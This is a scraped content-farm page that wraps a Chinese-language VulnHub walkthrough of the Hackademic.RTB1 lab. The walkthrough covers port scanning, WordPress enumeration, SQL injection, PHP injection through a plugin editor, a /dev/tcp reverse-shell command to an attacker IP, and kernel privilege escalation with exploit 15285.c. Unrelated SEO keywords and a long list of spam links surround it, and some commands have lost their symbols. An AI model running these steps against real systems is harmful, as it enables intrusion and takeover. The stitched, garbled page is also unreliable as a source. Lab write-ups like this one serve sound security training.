当前位置: 首页 > news >正文

推广做网站联系方式wordpress olam

推广做网站联系方式,wordpress olam,做h5场景的网站,北京网站优化网靶机下载链接#xff1a;https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip 一、主机探测和端口扫描 nmap 192.168.121.0/24 ip:192.168.121.196 端口:22、80 二、访问80端口 发现target可点击 点击后跳转#xff0c;页面提示目标是读取到 key.txt 文件 fin…靶机下载链接https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip 一、主机探测和端口扫描 nmap 192.168.121.0/24 ip:192.168.121.196 端口:22、80 二、访问80端口 发现target可点击 点击后跳转页面提示目标是读取到 key.txt 文件 findsomething插件 查看网站的js接口 拼接 /Hackademic_RTB1/?feedrss 看到 wordpress 版本 三、目录扫描 dirb http://192.168.121.196/ 前面发现为 wordpresskali 使用 wpscan 扫描网站 wpscan --url http://192.168.121.196 其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css 可以看到 wp-content 位置尝试将其修改为 wordpress的默认路径wp-admin发现后台登录页面 使用 wpscan 扫描用户 使用 cewl 爬取网站密码文本 cewl 192.168.121.196 -w pass.txt 密码未能成功爆破 我们回到findsomething中发现url中携带参数 可以进行sql注入 首先测cat参数发现存在sql注入 dump 下数据获取账号密码 挨个登录登录GeorgeMiller发现插件里面能直接修改php代码我们添加phpinfo发现成功解析 四、get shell exec(/bin/bash -c bash -i /dev/tcp/192.168.121.171/4444 01); kali开启监听访问hello.php文件成功反弹shell 五、提权 使用 python 启用交互式shell sudo -l 查看当前权限发现需要密码 查看内核版本 uname -a 搜一下相关版本的提权漏洞 searchsploit linux kernel 2.6.3 排除一些其他 linux 操作系统精确版本尝试后发现 15285.c 可利用 searchsploit -m 15285 开启一个临时 web 服务靶机将其下载到 tmp 目录下 python3 -m http.serverwget http://192.168.121.171:8000/15285.c 进行编译后执行文件提权成功 gcc 15285.c -o 15285 ./15285
http://www.dnsts.com.cn/news/148314.html

相关文章:

  • 右安门网站建设旅游网站设计图片
  • 创意图案设计网站大多数网站开发现状
  • 怎样免费做彩票网站新闻稿发布软文平台
  • 哔哩哔哩网站建设分析公司网站建设费属于宣传费吗
  • 织梦做网站如何套取别人网站的模板怎么修改网站模板
  • 南宁网站建设网站族蚂建站
  • 网站首页顶部图片尺寸潜江资讯网二手车
  • 个人网站的设计与实现的任务书建设手机行网站
  • 保定电子网站建设义乌微信网站建设费用
  • excel如何做超链接网站网站建设 网页设计 的文章
  • 网站建设推广费用广告公司有哪些
  • 手机直接看的网站有哪些长沙网络营销类岗位
  • 广州越秀区风险等级seo怎样才能优化网站
  • 网站全能空间成全视频免费观看在线看下载动漫
  • 手机上怎么做能打开的网站吗discuz是什么
  • 成都市那里有网站建设制作公司手机参数网
  • 天府新区规划建设国土局网站东莞关键词seo优化
  • 中建西部建设广通讯网站wordpress游客评论
  • 福州正规网站建设公司推荐涿州规划建设局网站
  • APP加网站建设预算多少钱最好看的免费观看全集电视剧
  • seo网站后台管理上海十大装修公司
  • 怎样才能把网站做好网站与网页设计
  • dedecms本地调试好的网站怎么上传到服务器自建电梯费用
  • 网站联盟接口怎么做网络推广员的工作内容和步骤
  • 什么企业做网站wordpress 后台修改模板
  • 静态网站建设的技术运用wordpress编辑图像
  • 仪表东莞网站建设电商网站开发会遇到哪些问题
  • 手机怎么制作自己的网站做任务用手机号登录网站
  • 本地门户网站源码wordpress主题门户一号
  • 鄂州第一官方网站红谷滩园林建设集团网站